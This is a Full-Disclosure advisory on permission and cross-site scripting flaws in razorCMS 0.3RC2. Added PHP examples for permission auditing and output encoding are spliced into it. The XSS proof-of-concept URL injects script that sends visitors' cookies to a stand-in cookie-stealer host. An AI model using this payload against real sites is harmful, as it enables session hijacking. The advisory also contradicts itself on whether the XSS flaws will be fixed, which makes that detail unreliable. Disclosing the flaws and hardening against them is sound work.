-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multiple Vulnerability Disclosure for razorCMS
- ----------------------------------------------

A recent security audit has uncovered multiple security vulnerabilities in the latest version (0.3RC2) and all previous versions of razorCMS CORE by Morgan Integrated Systems.

From the vendor site: "razorCMS is an open source content management system written in PHP, using a flat file database structure instead of having a separate database. It has been released under the GNU General Public License."

http://razorcms.co.uk, http://en.wikipedia.org/wiki/RazorCMS

* The razorCMS install script sets mode 0644 on admin/core/admin_config.php, which contains the site owner's cleartext FTP credentials and a sha1sum hash of the site admin password. Any local user has access to these credentials, and the admin password can easily be cracked offline (rainbow tables, brute force, etc). The vendor is planning for the use of stronger file permissions, two-way encryption for FTP credentials, and stronger salted hashes for admin passwords in the next release (version 0.4).

* razorCMS requires a laundry list of files to be mode 0777 for installation, and promises to correct these permissions after installation. The razorCMS install script leaves the following directories in mode 0777 after installation: the razorCMS root directory, the datastore/ directory, and the admin/core/ directory. The issue with this should be readily apparent to you. The vendor is considering fixing the installer in the next release.

* The razorCMS Security Manager is "used to ensure apache owned files have safe permissions set." In theory, if the Security Manager detects any insecure files, it will display a warning message and instruct the user to click a button to "secure" the site. By the same token, if all files are found to be secure, the Security Manager will display "All files are currently safe."
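For the permission problems described in the points above (a credentials file readable by every local user, directories left 0777 by the installer, and a Security Manager that only inspects a handful of files), the following is an added example, not razorCMS code, of what a whole-tree audit and fix of the install directory looks like. The install path on the command line, the list of credential-bearing files (admin/core/admin_config.php is the one the advisory names) and the target modes are assumptions for illustration.

```php
<?php
// Added example, not razorCMS code: a recursive permission audit of the kind
// a "Security Manager" needs to perform, plus the matching fix. The install
// root, the sensitive-file list and the target modes are assumptions.

declare(strict_types=1);

// Files holding credentials: must not be readable by group or others.
// admin/core/admin_config.php is the file named in the advisory.
const SENSITIVE_FILES = ['admin/core/admin_config.php'];

/**
 * Every entry under $root, including $root itself, as [relative path => mode].
 * The root is included because the installer leaves it at 0777.
 */
function list_entries(string $root): array
{
    $real = realpath($root);
    if ($real === false) {
        throw new RuntimeException("no such directory: $root");
    }
    $real = rtrim($real, '/');
    $entries = ['.' => fileperms($real) & 0777];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($real, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($iter as $path => $info) {
        $rel = substr($path, strlen($real) + 1);
        $entries[$rel] = fileperms($path) & 0777;
    }
    return $entries;
}

/**
 * Findings as [relative path, octal mode, reason]. Walks the whole tree, so a
 * recursive chmod 0777 of the install is reported entry by entry.
 */
function audit_permissions(string $root): array
{
    $findings = [];
    foreach (list_entries($root) as $rel => $mode) {
        if ($mode & 0002) {
            $findings[] = [$rel, sprintf('%04o', $mode), 'world-writable'];
        }
        if (in_array($rel, SENSITIVE_FILES, true) && ($mode & 0044)) {
            $findings[] = [$rel, sprintf('%04o', $mode), 'credentials readable by group/others'];
        }
    }
    return $findings;
}

/**
 * Apply safe modes: directories 0755, files 0644, credential files 0600.
 * Returns [changed, failed]. chmod fails on entries the running user does not
 * own, which is why a web-triggered "secure" button can only ever fix files
 * owned by the web server account; the rest need the site owner's shell.
 */
function secure_permissions(string $root): array
{
    $changed = 0;
    $failed  = [];
    $real = rtrim(realpath($root), '/');
    foreach (list_entries($root) as $rel => $mode) {
        $path = $rel === '.' ? $real : "$real/$rel";
        if (is_link($path)) {
            continue; // never chmod through a symlink
        }
        $want = is_dir($path) ? 0755 : (in_array($rel, SENSITIVE_FILES, true) ? 0600 : 0644);
        if ($mode === $want) {
            continue;
        }
        if (@chmod($path, $want)) {
            $changed++;
        } else {
            $failed[] = $rel;
        }
    }
    return [$changed, $failed];
}

// Usage from the command line (the path is an assumption):
//   php audit.php /var/www/razorcms
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (audit_permissions($argv[1]) as [$rel, $mode, $why]) {
        echo "$mode $rel: $why\n";
    }
    [$changed, $failed] = secure_permissions($argv[1]);
    echo "changed $changed entries; could not change: " . (implode(', ', $failed) ?: 'none') . "\n";
}
```

Running the audit before the fix gives the list of world-writable entries and any credentials file still readable by others; running it again afterwards, and checking that the `failed` list is empty, is the only meaningful basis for a message like "All files are currently safe." The 0600 target for the credentials file assumes PHP runs as the file's owner; under a shared Apache account the file has to be owned by that account or readable by it, which is exactly why the advisory's vendor fixes (encrypting the FTP credentials and salting the admin hash) matter in addition to the mode change.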
The problem is the Security Manager doesn't actually *do* anything -- it only checks the file permissions of a handful of files, and not even all of the Apache-owned files as it states. If a user were to recursively chmod the razorCMS installation to 0777 (which a novice user may be tempted to do, given the large number of files the installer requires to be mode 0777) and then rely on the Security Manager to secure the site, nearly all files and directories would be left in mode 0777 and the Security Manager would report "All files are currently safe." The vendor does not feel that this tool is broken, just that the phrase "All files" is misleading and the wording should be changed. I have been unsuccessful in convincing the vendor that the Security Manager should *actually* secure the site, so don't expect this to be fixed. Ever.

* Several cross-site scripting vulnerabilities have been discovered in the razorCMS admin section, and will be fixed for the next release:

http://yoursite.com/cms/admin/?action=edit&slab=home'>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));

The vendor has no plans to change this behaviour.

Timeline:

04.06.2009 - Initial vendor notification.
04.07.2009 - Vendor disputes vulnerabilities.
04.07.2009 - Vulnerabilities explained.
04.07.2009 - Vendor begins to implement certain fixes, refuses to fix others.
04.07.2009 - Vulnerabilities explained again.
04.07.2009 - Vendor continues to dispute some vulnerabilities.
04.15.2009 - Vendor notified for last time.
04.16.2009 - Public Disclosure.

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAknm9rQACgkQacHgESW3wZrSCQP/et6hdKAGKlYcwQ8y9zx/62knIlBm
w6cUDqxh1p2CSGhu81Uep9Rgx1DEftJ+ltGl/Nfe7iwuQNB+O0Ro42w5YLKyfpn11KeP
2aEChWUnZluavMHHKpSjeIYGWrQR1b6lUfWnULheuehZH/T3xvf3yy9DPScjAEQvI1hz
hXU6ua4=
=anJq
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
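The cross-site scripting item in the advisory above reflects the `slab` query parameter into the admin page's HTML without encoding. As an added example (not razorCMS code and not the vendor's fix), the block below shows that defect class in a small PHP function beside a hardened version; the function names, the markup and the allow-list pattern are assumptions for illustration.

```php
<?php
// Added example, not razorCMS code: the defect class behind the advisory's
// PoC (a request parameter reflected into HTML without encoding) beside a
// hardened version. Function names, markup and the allow-list are assumptions.

declare(strict_types=1);

// Vulnerable pattern: the slab name from the query string is written straight
// into an attribute and a text node, so a value containing ' and > breaks out.
function edit_link_vulnerable(string $slab): string
{
    return "<a href='?action=edit&slab=$slab'>edit $slab</a>";
}

// Encode for an HTML text or attribute context: both quote styles handled,
// invalid UTF-8 replaced rather than silently dropped.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened: the value is encoded for the URL query component first, then the
// whole attribute value is encoded for HTML; the text node is HTML-encoded.
// Each layer matches the context the data lands in.
function edit_link_safe(string $slab): string
{
    $href = '?action=edit&slab=' . rawurlencode($slab);
    return "<a href='" . h($href) . "'>edit " . h($slab) . "</a>";
}

// Defence in depth: slab names are page identifiers, so reject anything
// outside a narrow allow-list before the value reaches the template at all.
function valid_slab(string $slab): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $slab);
}

// Constructed probe with the same shape as the advisory's PoC: a quote and a
// closing bracket to leave the attribute, followed by markup.
$probe = "home'><script>alert(1)</script>";

// The vulnerable output contains the probe verbatim; the hardened output
// contains only encoded characters, and the allow-list rejects the probe.
echo edit_link_vulnerable($probe), "\n";
echo edit_link_safe($probe), "\n";
var_dump(valid_slab($probe));
var_dump(valid_slab('home'));
```

Output encoding is what closes the hole; the allow-list check is a second line of defence that also keeps odd values out of the flat-file datastore. Both are needed on every place the admin section echoes a request parameter, which is why the advisory speaks of several such issues rather than one.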